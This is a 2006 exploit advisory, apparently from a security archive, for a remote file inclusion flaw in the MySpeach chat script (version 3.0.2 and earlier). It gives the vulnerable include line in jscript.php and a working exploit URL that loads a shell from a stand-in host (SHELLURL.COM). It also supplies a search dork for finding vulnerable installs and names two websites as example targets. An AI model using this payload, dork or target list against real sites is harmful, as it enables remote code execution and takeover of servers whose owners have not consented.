MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit

2006-09-05T00:00:00
ID SECURITYVULNS:DOC:14153
Type securityvulns
Reporter Securityvulns
Modified 2006-09-05T00:00:00

Description

==============================================================================================

MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit

===============================================================================================

Critical Level : Very Dangerous

Venedor site : http://www.graphiks.net/telecharger/scripts/myspeach.zip

Version : v3.0.2 & All Versions Bellow

================================================================================================

Dork : allinurl: /myspeach/

================================================================================================

Bug in : jscript.php

Vlu Code :

--------------------------------

include($my_ms["root"].'/error.php');

================================================================================================

Exploit :

--------------------------------

http://sitename.com/[Script Path]/jscript.php?my_ms[root]=http://SHELLURL.COM?

Example :

http://www.seroweb.org/myspeach/

http://www.tribedusud.com/chat/myspeach

================================================================================================

Discoverd By : SHiKaA

Conatact : SHiKaA-[at]hotmail.com

GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior

==================================================================================================